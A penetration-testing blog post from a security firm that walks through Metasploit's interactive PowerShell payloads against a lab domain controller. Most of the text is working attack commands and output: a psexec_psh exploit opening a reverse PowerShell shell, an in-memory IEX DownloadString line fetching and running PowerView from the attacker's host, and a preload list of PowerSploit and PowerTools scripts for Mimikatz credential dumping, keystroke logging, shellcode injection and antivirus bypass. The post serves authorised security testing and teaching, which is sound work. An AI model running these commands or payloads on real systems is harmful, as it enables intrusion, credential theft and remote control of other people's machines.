Interactive PowerShell Sessions Within Meterpreter

In case anyone missed it, Metasploit has a couple of new payloads that allow interactive PowerShell sessions. What does that mean? Previously, if you tried to open a PowerShell session within Meterpreter, there was no interaction between PowerShell and your session.

Example:

msf exploit(psexec_psh) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:444/
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.81.10:49309 (UUID: 820e464723e817f9/x86=1/windows=1/2015-06-08T16:12:05Z) Staging Native payload ...
[*] Meterpreter session 23 opened (192.168.81.217:444 -> 192.168.81.10:49309) at 2015-06-08 12:12:05 -0400

meterpreter > shell
Process 2776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>powershell
powershell
Windows PowerShell 
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

Get-ExecutionPolicy


Any command that you type seems to disappear in the ether. Now, thanks to the hard work of
Ben Turner (@benpturner) and Dave Hardy (@davehardy20) at Nettitude, we have full interaction with PowerShell sessions! Their introduction to these modules is here.

To find the new payloads within Metasploit, simply search for “Interactive_Powershell”

msf payload(reverse_powershell) > search Interactive_Powershell

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   payload/cmd/windows/powershell_bind_tcp                      normal  Windows Interactive Powershell Session, Bind TCP
   payload/cmd/windows/powershell_reverse_tcp                   normal  Windows Interactive Powershell Session, Reverse TCP
   payload/windows/powershell_bind_tcp                          normal  Windows Interactive Powershell Session, Bind TCP
   payload/windows/powershell_reverse_tcp                       normal  Windows Interactive Powershell Session, Reverse TCP

Let’s try a “Reverse TCP” payload:

msf exploit(psexec_psh) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(psexec_psh) > exploit 

[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 24 opened (192.168.81.217:444 -> 192.168.81.10:49317) at 2015-06-08 12:15:42 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>Get-ExecutionPolicy
Bypass

This allows us to use all of our favorite PowerShell tools, such as PowerSploit and PowerTools (included in Veil-Framework), from within a Meterpreter session. To avoid downloading the tools to disk, we use “Invoke-Expression” to run the tools directly in memory. I like to host them locally, as opposed to downloading the from the Internet.

PS C:\Windows\system32>IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1")
PS C:\Windows\system32> Get-NetGroup "Domain Admins" |select UserName

UserName                                                                       
--------                                                                       
TrustedSec                                                                     
Administrator

Instead of loading modules from within an existing session, the payloads also allow you to configure modules before the session is created, by setting the “LOAD_MODULES” parameter.

Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting                                           Required  Description
   ----          ---------------                                           --------  -----------
   EXITFUNC      thread                                                    yes       Exit technique (accepted: seh, thread, process, none)
   LHOST         192.168.81.217                                            yes       The listen address
   LOAD_MODULES  http://192.168.81.217/PowerTools/PowerView/powerview.ps1  no        A list of powershell modules seperated by a comma to download over the web
   LPORT         444                                                       yes       The listen port

msf exploit(psexec_psh) > exploit 

[*] Loading 1 modules into the interactive PowerShell session
[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 26 opened (192.168.81.217:444 -> 192.168.81.10:49391) at 2015-06-08 12:29:58 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> Get-NetForest


Name                  : pwnt.com
Sites                 : {Default-First-Site-Name}
Domains               : {pwnt.com}
GlobalCatalogs        : {pwnt-dc.pwnt.com}
ApplicationPartitions : {DC=DomainDnsZones,DC=pwnt,DC=com, DC=ForestDnsZones,DC
                        =pwnt,DC=com}
ForestMode            : Windows2008R2Forest
RootDomain            : pwnt.com
Schema                : CN=Schema,CN=Configuration,DC=pwnt,DC=com
SchemaRoleOwner       : pwnt-dc.pwnt.com
NamingRoleOwner       : pwnt-dc.pwnt.com

You can also load multiple modules all at once by providing a list separated by commas. I cloned the PowerSploit and PowerTools modules to my Apache root, so to enumerate all modules, I simply use “find” to display all PowerShell scripts recursively.

root@kali:~# find /var/www -name "*.ps1"
/var/www/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/var/www/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
/var/www/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
/var/www/PowerSploit/Recon/Invoke-Portscan.ps1
/var/www/PowerSploit/Recon/Get-ComputerDetails.ps1
/var/www/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
/var/www/PowerSploit/Recon/Get-HttpStatus.ps1
/var/www/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
/var/www/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
/var/www/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
/var/www/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
/var/www/PowerSploit/Exfiltration/Out-Minidump.ps1
/var/www/PowerSploit/Exfiltration/Get-GPPPassword.ps1
/var/www/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
/var/www/PowerSploit/Exfiltration/Get-VaultCredential.ps1
/var/www/PowerSploit/Exfiltration/Get-Keystrokes.ps1
/var/www/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
/var/www/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
/var/www/PowerSploit/ScriptModification/Remove-Comments.ps1
/var/www/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
/var/www/PowerSploit/ScriptModification/Out-CompressedDll.ps1
/var/www/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
/var/www/PowerTools/PowerBreach/PowerBreach.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassSearch.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassCommand.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTokens.ps1
/var/www/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
/var/www/PowerTools/PowerPick/PSInjector/PSInject.ps1
/var/www/PowerTools/PowerUp/PowerUp.ps1
/var/www/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
/var/www/PowerTools/PowerView/functions/Get-NetShare.ps1
/var/www/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
/var/www/PowerTools/PowerView/functions/Invoke-Netview.ps1
/var/www/PowerTools/PowerView/functions/Get-Net.ps1
/var/www/PowerTools/PowerView/functions/Get-NetSessions.ps1
/var/www/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
/var/www/PowerTools/PowerView/powerview.ps1

To replace “/var/www” with your web host, use “sed”:

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1
http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1
http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1
http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
http://192.168.81.217/PowerTools/PowerView/powerview.ps1

To create a comma separated list, use “tr”:

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'|sed 's_/var/www_https://192.168.81.217_' |tr '\n' ','
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1,http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1,http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1,http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1,http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1,http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1,http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1,http://192.168.81.217/PowerTools/PowerView/powerview.ps1,

Copy/paste that output into your “LOAD_MODULES” parameter and all the PowerShell goodness is at your fingertips. Go forth and plunder!!!

This article was written by Larry Spohn @Spoonman1091 | Senior Principal Security Consultant.

TrustedSec

Author: TrustedSec

TrustedSec is a highly specialized information security company made up of some of the industry’s most respected individuals. We work with our business partners to increase their security posture, helping to reduce risk and impact in an ever-changing cyber landscape.